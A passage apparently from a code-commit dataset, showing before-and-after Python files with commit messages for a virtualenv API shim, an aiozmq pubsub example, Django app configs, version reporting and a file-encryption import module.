prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
Add a main function (more support for the api in the legacy virtualenv). | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
| <commit_before>from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
<commit_msg>Add a main function (more support for the api in the legacy virtualenv).<commit_after> | from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
| from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
Add a main function (more support for the api in the legacy virtualenv).from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
| <commit_before>from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
from virtualenv.core import create
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
):
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create",
]
<commit_msg>Add a main function (more support for the api in the legacy virtualenv).<commit_after>from __future__ import absolute_import, division, print_function
from virtualenv.__about__ import (
__author__, __copyright__, __email__, __license__, __summary__, __title__,
__uri__, __version__
)
# some support for old api in legacy virtualenv
from virtualenv.core import create
from virtualenv.__main__ import main # flake8: noqa
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
"create", "create_environment", "main",
]
def create_environment(
home_dir,
site_packages=False, clear=False,
unzip_setuptools=False,
prompt=None, search_dirs=None, never_download=False,
no_setuptools=False, no_pip=False, symlink=True
): # flake8: noqa
create(
home_dir,
system_site_packages=site_packages,
clear=clear,
prompt=prompt or "",
extra_search_dirs=search_dirs,
setuptools=not no_setuptools,
pip=not no_pip
)
|
33f1cd2950bf1544f4bb481aa0c31326a5c061ab | examples/rpc_pubsub.py | examples/rpc_pubsub.py | import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| Make rpc pubsub example stable | Make rpc pubsub example stable
| Python | bsd-2-clause | aio-libs/aiozmq,asteven/aiozmq,claws/aiozmq,MetaMemoryT/aiozmq | import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
Make rpc pubsub example stable | import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| <commit_before>import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
<commit_msg>Make rpc pubsub example stable<commit_after> | import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
Make rpc pubsub example stableimport asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
| <commit_before>import asyncio
import aiozmq.rpc
class Handler(aiozmq.rpc.AttrHandler):
@aiozmq.rpc.method
def remote_func(self, a: int, b: int):
pass
@asyncio.coroutine
def go():
subscriber = yield from aiozmq.rpc.serve_pubsub(
Handler(), subscribe='topic', bind='tcp://*:*')
subscriber_addr = next(iter(subscriber.transport.bindings()))
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
yield from publisher.publish('topic').remote_func(1, 2)
subscriber.close()
publisher.close()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
<commit_msg>Make rpc pubsub example stable<commit_after>import asyncio
import aiozmq.rpc
from itertools import count
class Handler(aiozmq.rpc.AttrHandler):
def __init__(self):
self.connected = False
@aiozmq.rpc.method
def remote_func(self, step, a: int, b: int):
self.connected = True
print("HANDLER", step, a, b)
@asyncio.coroutine
def go():
handler = Handler()
subscriber = yield from aiozmq.rpc.serve_pubsub(
handler, subscribe='topic', bind='tcp://127.0.0.1:*',
log_exceptions=True)
subscriber_addr = next(iter(subscriber.transport.bindings()))
print("SERVE", subscriber_addr)
publisher = yield from aiozmq.rpc.connect_pubsub(
connect=subscriber_addr)
for step in count(0):
yield from publisher.publish('topic').remote_func(step, 1, 2)
if handler.connected:
break
else:
yield from asyncio.sleep(0.1)
subscriber.close()
yield from subscriber.wait_closed()
publisher.close()
yield from publisher.wait_closed()
def main():
asyncio.get_event_loop().run_until_complete(go())
print("DONE")
if __name__ == '__main__':
main()
|
fd5507db05429635200d56d4763fe623dfa6a811 | pinax/messages/apps.py | pinax/messages/apps.py | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| Drop miscellaneous features deprecated in Django 3 | Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3
| Python | mit | pinax/pinax-messages,pinax/pinax-messages | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3 | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| <commit_before>from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
<commit_msg>Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3<commit_after> | from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
| <commit_before>from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import ugettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
<commit_msg>Drop miscellaneous features deprecated in Django 3
https://docs.djangoproject.com/en/dev/releases/3.0/#id3<commit_after>from django.apps import AppConfig as BaseAppConfig
from django.utils.translation import gettext_lazy as _
class AppConfig(BaseAppConfig):
name = "pinax.messages"
label = "pinax_messages"
verbose_name = _("Pinax Messages")
|
891ce02157c0862f707cab7a140389e0b059acd4 | registration/__init__.py | registration/__init__.py | VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
| VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| Fix version number reporting so we can be installed before Django. | Fix version number reporting so we can be installed before Django.
| Python | bsd-3-clause | christang/django-registration-1.5,fedenko/django-registration,fedenko/django-registration,christang/django-registration-1.5 | VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
Fix version number reporting so we can be installed before Django. | VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| <commit_before>VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
<commit_msg>Fix version number reporting so we can be installed before Django.<commit_after> | VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
Fix version number reporting so we can be installed before Django.VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
| <commit_before>VERSION = (0, 9, 0, 'beta', 1)
def get_version():
from django.utils.version import get_version as django_get_version
return django_get_version(VERSION) # pragma: no cover
<commit_msg>Fix version number reporting so we can be installed before Django.<commit_after>VERSION = (1, 0, 0, 'final', 0)
def get_version():
"Returns a PEP 386-compliant version number from VERSION."
assert len(VERSION) == 5
assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if VERSION[2] == 0 else 3
main = '.'.join(str(x) for x in VERSION[:parts])
sub = ''
if VERSION[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[VERSION[3]] + str(VERSION[4])
return str(main + sub)
|
7b2db239b0862db256722f57241c74d4cc9b42ff | diss/__init__.py | diss/__init__.py |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
|
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
| Fix mimetype detection on symlink | Fix mimetype detection on symlink
| Python | agpl-3.0 | hoh/Billabong,hoh/Billabong |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
Fix mimetype detection on symlink |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
    """Import a file into Dis.

    The file is copied into encrypted storage under *key* (a random key
    is generated when none is given), its metadata is saved in the
    inventory, and the metadata record is returned.

    :param filepath: path of the file to import; symlinks are followed.
    :param key: symmetric encryption key, or None to generate one.
    :raises FileNotFoundError: if *filepath* is not a regular file.
    """
    # Resolve symlinks so size/type inspection applies to the target file
    # (libmagic would otherwise describe the link itself).
    realpath = os.path.realpath(filepath)
    if not os.path.isfile(realpath):
        raise FileNotFoundError(filepath)
    if key is None:
        key = random_key()
    file_hash = hashing()
    # Use a context manager so the file handle is closed deterministically
    # instead of being leaked until garbage collection.
    with open(realpath, 'rb') as source:
        file_hash.update(source.read())
    id_ = copy_and_encrypt(filepath, key)
    meta = {
        'key': b64encode(key),
        'hash': 'sha256-' + file_hash.hexdigest(),
        'size': os.path.getsize(realpath),
        'timestamp': datetime.now(),
        'id': id_,
        'info': {
            'type': magic.from_file(realpath).decode(),
            'mimetype': magic.from_file(realpath, mime=True).decode(),
            'filename': os.path.basename(filepath),
            'path': filepath,
        }
    }
    inventory.save_record(meta)
    return meta
def get_content(id_, *, offset=0, length=None):
    """Decrypt and return (part of) the content of blob *id_*.

    The blob's key is looked up in the inventory; *offset* and *length*
    select a byte range (the whole blob when length is None).
    """
    record = inventory.get_record(id_)
    blob_key = b64decode(record['key'])
    return decrypt_blob(id_, blob_key, offset=offset, length=length)
| <commit_before>
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
<commit_msg>Fix mimetype detection on symlink<commit_after> |
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
|
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
Fix mimetype detection on symlink
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
| <commit_before>
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(filepath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(filepath).decode(),
'mimetype': magic.from_file(filepath, mime=True).decode(),
'filename': os.path.basename(filepath),
'path': filepath,
}
}
inventory.save_record(meta)
return meta
def get_content(id_, *, offset=0, length=None):
key = b64decode(inventory.get_record(id_)['key'])
return decrypt_blob(id_, key, offset=offset, length=length)
<commit_msg>Fix mimetype detection on symlink<commit_after>
import os
import hashlib
import magic
from base64 import b64encode, b64decode
from datetime import datetime
from .settings import inventory
from .encryption import random_key, copy_and_encrypt, decrypt_blob
hashing = hashlib.sha256
def add_file(filepath, *, key=None):
"Import a file into Dis."
# Resolve symlinks
realpath = os.path.realpath(filepath)
if not os.path.isfile(filepath):
raise FileNotFoundError
if key is None:
key = random_key()
file_hash = hashing()
file_hash.update(open(filepath, 'rb').read())
id_ = copy_and_encrypt(filepath, key)
meta = {
'key': b64encode(key),
'hash': 'sha256-' + file_hash.hexdigest(),
'size': os.path.getsize(realpath),
'timestamp': datetime.now(),
'id': id_,
'info': {
'type': magic.from_file(realpath).decode(),
'mimetype': magic.from_file(realpath, mime=True).decode(),
'filename': os.path.basename(filepath),
